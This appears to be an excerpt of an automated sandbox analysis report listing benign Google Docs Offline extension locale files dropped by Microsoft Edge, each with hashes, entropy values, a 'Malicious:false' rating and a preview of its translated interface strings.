                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):908
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.512512697156616
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:12:1HASvgMTCBxNB+kCIww3v+BBJ/wjsV8lCBxeBeRiGTCSU8biHULaBg/4srCBhUJJ:1HAkkJ+kCIwEg/wwbw0PXa22QLWmSDg
                                                                                                                                                                                                                                                                                                                          MD5:12403EBCCE3AE8287A9E823C0256D205
                                                                                                                                                                                                                                                                                                                          SHA1:C82D43C501FAE24BFE05DB8B8F95ED1C9AC54037
                                                                                                                                                                                                                                                                                                                          SHA-256:B40BDE5B612CFFF936370B32FB0C58CC205FC89937729504C6C0B527B60E2CBA
                                                                                                                                                                                                                                                                                                                          SHA-512:153401ECDB13086D2F65F9B9F20ACB3CEFE5E2AEFF1C31BA021BE35BF08AB0634812C33D1D34DA270E5693A8048FC5E2085E30974F6A703F75EA1622A0CA0FFD
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "SKEP NUWE".. },.. "explanationofflinedisabled": {.. "message": "Jy is vanlyn. As jy Google Dokumente sonder 'n internetverbinding wil gebruik, moet jy die volgende keer as jy aan die internet gekoppel is na instellings op die Google Dokumente-tuisblad gaan en vanlynsinkronisering aanskakel.".. },.. "explanationofflineenabled": {.. "message": "Jy is vanlyn, maar jy kan nog steeds beskikbare l.ers redigeer of nuwes skep.".. },.. "extdesc": {.. "message": "Skep, wysig en bekyk jou dokumente, sigblaaie en aanbiedings . alles sonder toegang tot die internet.".. },.. "extname": {.. "message": "Google Vanlyn Dokumente".. },.. "learnmore": {.. "message": "Kom meer te wete".. },.. "popuphelptext": {.. "message": "Skryf, redigeer en werk saam, waar jy ook al is, met of sonder 'n internetverbinding.".. }..}..

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir7924_581038178\CRX_INSTALL\_locales\am\messages.json

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):1285
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.702209356847184
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:24:1HAn6bfEpxtmqMI91ivWjm/6GcCIoToCZzlgkX/Mj:W6bMt3MITFjm/Pcd4oCZhg6k
                                                                                                                                                                                                                                                                                                                          MD5:9721EBCE89EC51EB2BAEB4159E2E4D8C
                                                                                                                                                                                                                                                                                                                          SHA1:58979859B28513608626B563138097DC19236F1F
                                                                                                                                                                                                                                                                                                                          SHA-256:3D0361A85ADFCD35D0DE74135723A75B646965E775188F7DCDD35E3E42DB788E
                                                                                                                                                                                                                                                                                                                          SHA-512:FA3689E8663565D3C1C923C81A620B006EA69C99FB1EB15D07F8F45192ED9175A6A92315FA424159C1163382A3707B25B5FC23E590300C62CBE2DACE79D84871
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "... ...".. },.. "explanationofflinedisabled": {.. "message": "..... .. .... Google ..... ........ ..... ..... .Google .... ... .. .. .. ..... .... ....... .. ....... ... .. .. ..... .. ..... ....".. },.. "explanationofflineenabled": {.. "message": "..... .. .... ... .. .... .... ..... .... ... ..... .... .....".. },.. "extdesc": {.. "message": "...... ..... .... ... .. ..... ...... ..... .... .. ..... . .... .. ...... .....".. },.. "extname": {.. "message": "..... .. Goog

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir7924_581038178\CRX_INSTALL\_locales\ar\messages.json

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):1244
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.5533961615623735
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:12:1HASvgPCBxNhieFTr9ogjIxurIyJCCBxeh6wAZKn7uCSUhStuysUm+WCBhSueW1Y:1HAgJzoaC6VEn7Css8yoXzzd
                                                                                                                                                                                                                                                                                                                          MD5:3EC93EA8F8422FDA079F8E5B3F386A73
                                                                                                                                                                                                                                                                                                                          SHA1:24640131CCFB21D9BC3373C0661DA02D50350C15
                                                                                                                                                                                                                                                                                                                          SHA-256:ABD0919121956AB535E6A235DE67764F46CFC944071FCF2302148F5FB0E8C65A
                                                                                                                                                                                                                                                                                                                          SHA-512:F40E879F85BC9B8120A9B7357ED44C22C075BF065F45BEA42BD5316AF929CBD035D5D6C35734E454AEF5B79D378E51A77A71FA23F9EBD0B3754159718FCEB95C
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "..... ....".. },.. "explanationofflinedisabled": {.. "message": "... ... ...... ........ ....... Google ... ..... .......... ..... ... ......... .. ...... ........ ........ Google ..... ........ ... ..... .. ..... ....... .... .... .... ..........".. },.. "explanationofflineenabled": {.. "message": "... ... ...... .... .. .... ....... ..... ....... ....... .. ..... ..... ......".. },.. "extdesc": {.. "message": "..... ......... ...... ........ ....... ......... ........ ....... .. ... ... ..... .........".. },.. "extname": {.. "message": "....... Google ... ......".. },.. "learnmore": {.. "messa

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir7924_581038178\CRX_INSTALL\_locales\az\messages.json

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):977
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.867640976960053
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:24:1HAWNjbwlmyuAoW32Md+80cVLdUSERHtRo3SjX:J3wlzs42m+8TV+S4H0CjX
                                                                                                                                                                                                                                                                                                                          MD5:9A798FD298008074E59ECC253E2F2933
                                                                                                                                                                                                                                                                                                                          SHA1:1E93DA985E880F3D3350FC94F5CCC498EFC8C813
                                                                                                                                                                                                                                                                                                                          SHA-256:628145F4281FA825D75F1E332998904466ABD050E8B0DC8BB9B6A20488D78A66
                                                                                                                                                                                                                                                                                                                          SHA-512:9094480379F5AB711B3C32C55FD162290CB0031644EA09A145E2EF315DA12F2E55369D824AF218C3A7C37DD9A276AEEC127D8B3627D3AB45A14B0191ED2BBE70
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "YEN.S.N. YARADIN".. },.. "explanationofflinedisabled": {.. "message": "Oflayns.n.z. Google S.n.di internet ba.lant.s. olmadan istifad. etm.k ist.yirsinizs., Google S.n.din .sas s.hif.sind. ayarlara gedin v. n.vb.ti d.f. internet. qo.ulanda oflayn sinxronizasiyan. aktiv edin.".. },.. "explanationofflineenabled": {.. "message": "Oflayns.n.z, amma m.vcud fayllar. redakt. ed. v. yenil.rini yarada bil.rsiniz.".. },.. "extdesc": {.. "message": "S.n.d, c.dv.l v. t.qdimatlar.n ham.s.n. internet olmadan redakt. edin, yarad.n v. bax.n.".. },.. "extname": {.. "message": "Google S.n.d Oflayn".. },.. "learnmore": {.. "message": ".trafl. M.lumat".. },.. "popuphelptext": {.. "message": "Harda olma..n.zdan v. internet. qo.ulu olub-olmad...n.zdan as.l. olmayaraq, yaz.n, redakt. edin v. .m.kda.l.q edin.".. }..}..

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir7924_581038178\CRX_INSTALL\_locales\be\messages.json

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):3107
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):3.535189746470889
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:48:YOWdTQ0QRk+QyJQAy6Qg4QWSe+QECTQLHQlQIfyQ0fnWQjQDrTQik+QvkZTQ+89b:GdTbyRvwgbCTEHQhyVues9oOT3rOCkV
                                                                                                                                                                                                                                                                                                                          MD5:68884DFDA320B85F9FC5244C2DD00568
                                                                                                                                                                                                                                                                                                                          SHA1:FD9C01E03320560CBBB91DC3D1917C96D792A549
                                                                                                                                                                                                                                                                                                                          SHA-256:DDF16859A15F3EB3334D6241975CA3988AC3EAFC3D96452AC3A4AFD3644C8550
                                                                                                                                                                                                                                                                                                                          SHA-512:7FF0FBD555B1F9A9A4E36B745CBFCAD47B33024664F0D99E8C080BE541420D1955D35D04B5E973C07725573E592CD0DD84FDBB867C63482BAFF6929ADA27CCDE
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:{"createnew":{"message":"\u0421\u0422\u0412\u0410\u0420\u042b\u0426\u042c \u041d\u041e\u0412\u042b"},"explanationofflinedisabled":{"message":"\u0412\u044b \u045e \u043f\u0430\u0437\u0430\u0441\u0435\u0442\u043a\u0430\u0432\u044b\u043c \u0440\u044d\u0436\u044b\u043c\u0435. \u041a\u0430\u0431 \u043a\u0430\u0440\u044b\u0441\u0442\u0430\u0446\u0446\u0430 \u0414\u0430\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u043c\u0456 Google \u0431\u0435\u0437 \u043f\u0430\u0434\u043a\u043b\u044e\u0447\u044d\u043d\u043d\u044f \u0434\u0430 \u0456\u043d\u0442\u044d\u0440\u043d\u044d\u0442\u0443, \u043f\u0435\u0440\u0430\u0439\u0434\u0437\u0456\u0446\u0435 \u0434\u0430 \u043d\u0430\u043b\u0430\u0434 \u043d\u0430 \u0433\u0430\u043b\u043e\u045e\u043d\u0430\u0439 \u0441\u0442\u0430\u0440\u043e\u043d\u0446\u044b \u0414\u0430\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u045e Google \u0456 \u045e\u043a\u043b\u044e\u0447\u044b\u0446\u0435 \u0441\u0456\u043d\u0445\u0440\u0430\u043d\u0456\u0437\u0430\u0446\u044b\u044e

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir7924_581038178\CRX_INSTALL\_locales\bg\messages.json

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):1389
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.561317517930672
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:24:1HAp1DQqUfZ+Yann08VOeadclUZbyMzZzsYvwUNn7nOyRK8/nn08V7:g1UTfZ+Ya08Uey3tflCRE08h
                                                                                                                                                                                                                                                                                                                          MD5:2E6423F38E148AC5A5A041B1D5989CC0
                                                                                                                                                                                                                                                                                                                          SHA1:88966FFE39510C06CD9F710DFAC8545672FFDCEB
                                                                                                                                                                                                                                                                                                                          SHA-256:AC4A8B5B7C0B0DD1C07910F30DCFBDF1BCB701CFCFD182B6153FD3911D566C0E
                                                                                                                                                                                                                                                                                                                          SHA-512:891FCDC6F07337970518322C69C6026896DD3588F41F1E6C8A1D91204412CAE01808F87F9F2DEA1754458D70F51C3CEF5F12A9E3FC011165A42B0844C75EC683
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": ".........".. },.. "explanationofflinedisabled": {.. "message": "...... .... .. .. .......... Google ......... ... ........ ......, ........ ........... . ......... ........ .. Google ......... . ........ ...... .............. ......... ..., ...... ..... ...... . .........".. },.. "explanationofflineenabled": {.. "message": "...... ..., .. ... ...... .. ........... ......... ....... ... .. ......... .....".. },.. "extdesc": {.. "message": "............, .......... . ............ ...... ........., .......... ....... . ........... . ...... .... ... ...... .. .........".. },..

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir7924_581038178\CRX_INSTALL\_locales\bn\messages.json

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):1763
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.25392954144533
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:24:1HABGtNOtIyHmVd+q+3X2AFl2DhrR7FAWS9+SMzI8QVAEq8yB0XtfOyvU7D:oshmm/+H2Ml2DrFPS9+S99EzBd7D
                                                                                                                                                                                                                                                                                                                          MD5:651375C6AF22E2BCD228347A45E3C2C9
                                                                                                                                                                                                                                                                                                                          SHA1:109AC3A912326171D77869854D7300385F6E628C
                                                                                                                                                                                                                                                                                                                          SHA-256:1DBF38E425C5C7FC39E8077A837DF0443692463BA1FBE94E288AB5A93242C46E
                                                                                                                                                                                                                                                                                                                          SHA-512:958AA7CF645FAB991F2ECA0937BA734861B373FB1C8BCC001599BE57C65E0917F7833A971D93A7A6423C5F54A4839D3A4D5F100C26EFA0D2A068516953989F9D
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": ".... .... ....".. },.. "explanationofflinedisabled": {.. "message": ".... ....... ....... .... ......... ..... ..... Google ........ ....... ...., Google .......... ........ ....... ... ... .... ... .... ... ........... .... ....... .... ... ...... ..... .... .....".. },.. "explanationofflineenabled": {.. "message": ".... ....... ......, ...... .... .... ...... .......... ........ .... .. .... .... .... .... .......".. },.. "extdesc":

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir7924_581038178\CRX_INSTALL\_locales\ca\messages.json

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):930
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.569672473374877
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:12:1HASvggoSCBxNFT0sXuqgEHQ2fTq9blUJYUJaw9CBxejZFPLOjCSUuE44pMiiDat:1HAtqs+BEHGpURxSp1iUPWCAXtRKe
                                                                                                                                                                                                                                                                                                                          MD5:D177261FFE5F8AB4B3796D26835F8331
                                                                                                                                                                                                                                                                                                                          SHA1:4BE708E2FFE0F018AC183003B74353AD646C1657
                                                                                                                                                                                                                                                                                                                          SHA-256:D6E65238187A430FF29D4C10CF1C46B3F0FA4B91A5900A17C5DFD16E67FFC9BD
                                                                                                                                                                                                                                                                                                                          SHA-512:E7D730304AED78C0F4A78DADBF835A22B3D8114FB41D67B2B26F4FE938B572763D3E127B7C1C81EBE7D538DA976A7A1E7ADC40F918F88AFADEA2201AE8AB47D0
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "CREA'N UN DE NOU".. },.. "explanationofflinedisabled": {.. "message": "No tens connexi.. Per utilitzar Documents de Google sense connexi. a Internet, ves a la configuraci. de la p.gina d'inici d'aquest servei i activa l'opci. per sincronitzar-se sense connexi. la propera vegada que estiguis connectat a la xarxa.".. },.. "explanationofflineenabled": {.. "message": "Tot i que no tens connexi., pots editar o crear fitxers.".. },.. "extdesc": {.. "message": "Edita, crea i consulta documents, fulls de c.lcul i presentacions, tot sense acc.s a Internet.".. },.. "extname": {.. "message": "Documents de Google sense connexi.".. },.. "learnmore": {.. "message": "M.s informaci.".. },.. "popuphelptext": {.. "message": "Escriu text, edita fitxers i col.labora-hi siguis on siguis, amb o sense connexi. a Internet.".. }..}..

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir7924_581038178\CRX_INSTALL\_locales\cs\messages.json

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):913
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.947221919047
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:12:1HASvgdsbCBxNBmobXP15Dxoo60n40h6qCBxeBeGG/9jZCSUKFPDLZ2B2hCBhPLm:1HApJmoZ5e50nzQhwAd7dvYB2kDSGGKs
                                                                                                                                                                                                                                                                                                                          MD5:CCB00C63E4814F7C46B06E4A142F2DE9
                                                                                                                                                                                                                                                                                                                          SHA1:860936B2A500CE09498B07A457E0CCA6B69C5C23
                                                                                                                                                                                                                                                                                                                          SHA-256:21AE66CE537095408D21670585AD12599B0F575FF2CB3EE34E3A48F8CC71CFAB
                                                                                                                                                                                                                                                                                                                          SHA-512:35839DAC6C985A6CA11C1BFF5B8B5E59DB501FCB91298E2C41CB0816B6101BF322445B249EAEA0CEF38F76D73A4E198F2B6E25EEA8D8A94EA6007D386D4F1055
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "VYTVO.IT".. },.. "explanationofflinedisabled": {.. "message": "Jste offline. Pokud chcete Dokumenty Google pou..vat bez p.ipojen. k.internetu, a. budete p...t. online, p.ejd.te do nastaven. na domovsk. str.nce Dokument. Google a.zapn.te offline synchronizaci.".. },.. "explanationofflineenabled": {.. "message": "Jste offline, ale st.le m..ete upravovat dostupn. soubory nebo vytv..et nov..".. },.. "extdesc": {.. "message": "Upravujte, vytv..ejte a.zobrazujte sv. dokumenty, tabulky a.prezentace . v.e bez p..stupu k.internetu.".. },.. "extname": {.. "message": "Dokumenty Google offline".. },.. "learnmore": {.. "message": "Dal.. informace".. },.. "popuphelptext": {.. "message": "Pi.te, upravujte a.spolupracujte kdekoli, s.p.ipojen.m k.internetu i.bez n.j.".. }..}..

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir7924_581038178\CRX_INSTALL\_locales\cy\messages.json

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):806
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.815663786215102
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:12:YGo35xMxy6gLr4Dn1eBVa1xzxyn1VFQB6FDVgdAJex9QH7uy+XJEjENK32J21j:Y735+yoeeRG54uDmdXx9Q7u3r83Xj
                                                                                                                                                                                                                                                                                                                          MD5:A86407C6F20818972B80B9384ACFBBED
                                                                                                                                                                                                                                                                                                                          SHA1:D1531CD0701371E95D2A6BB5EDCB79B949D65E7C
                                                                                                                                                                                                                                                                                                                          SHA-256:A482663292A913B02A9CDE4635C7C92270BF3C8726FD274475DC2C490019A7C9
                                                                                                                                                                                                                                                                                                                          SHA-512:D9FBF675514A890E9656F83572208830C6D977E34D5744C298A012515BC7EB5A17726ADD0D9078501393BABD65387C4F4D3AC0CC0F7C60C72E09F336DCA88DE7
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:{"createnew":{"message":"CREU NEWYDD"},"explanationofflinedisabled":{"message":"Rydych chi all-lein. I ddefnyddio Dogfennau Google heb gysylltiad \u00e2'r rhyngrwyd, ewch i'r gosodiadau ar dudalen hafan Dogfennau Google a throi 'offine sync' ymlaen y tro nesaf y byddwch wedi'ch cysylltu \u00e2'r rhyngrwyd."},"explanationofflineenabled":{"message":"Rydych chi all-lein, ond gallwch barhau i olygu'r ffeiliau sydd ar gael neu greu rhai newydd."},"extdesc":{"message":"Gallwch olygu, creu a gweld eich dogfennau, taenlenni a chyflwyniadau \u2013 i gyd heb fynediad i'r rhyngrwyd."},"extname":{"message":"Dogfennau Google All-lein"},"learnmore":{"message":"DYSGU MWY"},"popuphelptext":{"message":"Ysgrifennwch, golygwch a chydweithiwch lle bynnag yr ydych, gyda chysylltiad \u00e2'r rhyngrwyd neu hebddo."}}.

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir7924_581038178\CRX_INSTALL\_locales\da\messages.json

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):883
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.5096240460083905
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:24:1HA4EFkQdUULMnf1yo+9qgpukAXW9bGJTvDyqdr:zEFkegfw9qwAXWNs/yu
                                                                                                                                                                                                                                                                                                                          MD5:B922F7FD0E8CCAC31B411FC26542C5BA
                                                                                                                                                                                                                                                                                                                          SHA1:2D25E153983E311E44A3A348B7D97AF9AAD21A30
                                                                                                                                                                                                                                                                                                                          SHA-256:48847D57C75AF51A44CBF8F7EF1A4496C2007E58ED56D340724FDA1604FF9195
                                                                                                                                                                                                                                                                                                                          SHA-512:AD0954DEEB17AF04858DD5EC3D3B3DA12DFF7A666AF4061DEB6FD492992D95DB3BAF751AB6A59BEC7AB22117103A93496E07632C2FC724623BB3ACF2CA6093F3
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "OPRET NYT".. },.. "explanationofflinedisabled": {.. "message": "Du er offline. Hvis du vil bruge Google Docs uden en internetforbindelse, kan du g. til indstillinger p. startsiden for Google Docs og aktivere offlinesynkronisering, n.ste gang du har internetforbindelse.".. },.. "explanationofflineenabled": {.. "message": "Du er offline, men du kan stadig redigere tilg.ngelige filer eller oprette nye.".. },.. "extdesc": {.. "message": "Rediger, opret og se dine dokumenter, regneark og pr.sentationer helt uden internetadgang.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "F. flere oplysninger".. },.. "popuphelptext": {.. "message": "Skriv, rediger og samarbejd, uanset hvor du er, og uanset om du har internetforbindelse.".. }..}..

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir7924_581038178\CRX_INSTALL\_locales\de\messages.json

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):1031
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.621865814402898
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:24:1HA6sZnqWd77ykJzCkhRhoe1HMNaAJPwG/p98HKpy2kX/R:WZqWxykJzthRhoQma+tpyHX2O/R
                                                                                                                                                                                                                                                                                                                          MD5:D116453277CC860D196887CEC6432FFE
                                                                                                                                                                                                                                                                                                                          SHA1:0AE00288FDE696795CC62FD36EABC507AB6F4EA4
                                                                                                                                                                                                                                                                                                                          SHA-256:36AC525FA6E28F18572D71D75293970E0E1EAD68F358C20DA4FDC643EEA2C1C5
                                                                                                                                                                                                                                                                                                                          SHA-512:C788C3202A27EC220E3232AE25E3C855F3FDB8F124848F46A3D89510C564641A2DFEA86D5014CEA20D3D2D3C1405C96DBEB7CCAD910D65C55A32FDCA8A33FDD4
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "NEU ERSTELLEN".. },.. "explanationofflinedisabled": {.. "message": "Sie sind offline. Um Google Docs ohne Internetverbindung zu verwenden, gehen Sie auf der Google Docs-Startseite auf \"Einstellungen\" und schalten die Offlinesynchronisierung ein, wenn Sie das n.chste Mal mit dem Internet verbunden sind.".. },.. "explanationofflineenabled": {.. "message": "Sie sind offline, aber k.nnen weiterhin verf.gbare Dateien bearbeiten oder neue Dateien erstellen.".. },.. "extdesc": {.. "message": "Mit der Erweiterung k.nnen Sie Dokumente, Tabellen und Pr.sentationen bearbeiten, erstellen und aufrufen.. ganz ohne Internetverbindung.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Weitere Informationen".. },.. "popuphelptext": {.. "message": "Mit oder ohne Internetverbindung: Sie k.nnen von .berall Dokumente erstellen, .ndern und zusammen mit anderen

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir7924_581038178\CRX_INSTALL\_locales\el\messages.json

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):1613
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.618182455684241
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:24:1HAJKan4EITDZGoziRAc2Z8eEfkTJfLhGX7b0UBNoAcGpVyhxefSmuq:SKzTD0IK85JlwsGOUyaSk
                                                                                                                                                                                                                                                                                                                          MD5:9ABA4337C670C6349BA38FDDC27C2106
                                                                                                                                                                                                                                                                                                                          SHA1:1FC33BE9AB4AD99216629BC89FBB30E7AA42B812
                                                                                                                                                                                                                                                                                                                          SHA-256:37CA6AB271D6E7C9B00B846FDB969811C9CE7864A85B5714027050795EA24F00
                                                                                                                                                                                                                                                                                                                          SHA-512:8564F93AD8485C06034A89421CE74A4E719BBAC865E33A7ED0B87BAA80B7F7E54B240266F2EDB595DF4E6816144428DB8BE18A4252CBDCC1E37B9ECC9F9D7897
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": ".......... ....".. },.. "explanationofflinedisabled": {.. "message": "..... ..... ......... ... .. ............... .. ....... Google ..... ....... ... ........., ......... .... ......... .... ...... ...... ... ........ Google ... ............. ... ........... ..... ........ ... ....... .... ... .. ..... ............ ... ..........".. },.. "explanationofflineenabled": {.. "message": "..... ..... ........ .... ........ .. .............. .. ......... ...... . .. ............. ... .......".. },.. "extdesc": {.. "message": ".............., ............ ... ..... .. ......., .

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir7924_581038178\CRX_INSTALL\_locales\en\messages.json

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):851
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.4858053753176526
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:12:1HASvgg4eCBxNdN3Pj1NzXW6iFryCBxesJGceKCSUuvNn3AwCBhUufz1tHaXRdAv:1HA3dj/BNzXviFrpj4sNQXJezAa6
                                                                                                                                                                                                                                                                                                                          MD5:07FFBE5F24CA348723FF8C6C488ABFB8
                                                                                                                                                                                                                                                                                                                          SHA1:6DC2851E39B2EE38F88CF5C35A90171DBEA5B690
                                                                                                                                                                                                                                                                                                                          SHA-256:6895648577286002F1DC9C3366F558484EB7020D52BBF64A296406E61D09599C
                                                                                                                                                                                                                                                                                                                          SHA-512:7ED2C8DB851A84F614D5DAF1D5FE633BD70301FD7FF8A6723430F05F642CEB3B1AD0A40DE65B224661C782FFCEC69D996EBE3E5BB6B2F478181E9A07D8CD41F6
                                                                                                                                                                                                                                                                                                                          Malicious:false
